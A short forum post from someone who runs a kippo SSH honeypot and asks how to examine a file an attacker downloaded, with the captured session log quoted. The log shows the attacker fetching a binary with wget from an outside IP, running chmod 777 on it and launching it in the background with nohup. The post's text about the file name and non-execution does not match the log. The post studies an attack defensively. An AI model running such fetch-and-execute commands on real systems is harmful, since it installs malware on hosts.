First post. Hope you are all well.
I set up a kippo honeypot a few days ago and got my first bite earlier today. The attacker immediately issued a wget command and downloaded a file called network.bin.
I was wondering what methods you would suggest in examining this file further? Is it possible to read the code safely and establish the purpose of the file?
Interestingly the attacker did not execute the file.
Thanks in advance,
debian-server:~# wget http://xxx.xxx.xxx.208:1130/Manager
--2014-12-30 16:58:08-- http://xxx.xxx.xxx.208:1130/Manager
Connecting to xxx.xxx.xxx.208:1130... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1135000 (1M) application/octet-stream
Saving to: `Manager
25% ==========> 291,224 78K/s eta 10schmod 777 Manager
57% ======================> 656,643 82K/s eta 5snohup //root/Manager > /dev/null 2>&1 &
100%======================================> 1,135,000 83K/s eta 0s
2014-12-30 16:58:22 (83 KB/s) - `Manager' saved 1135000/1135000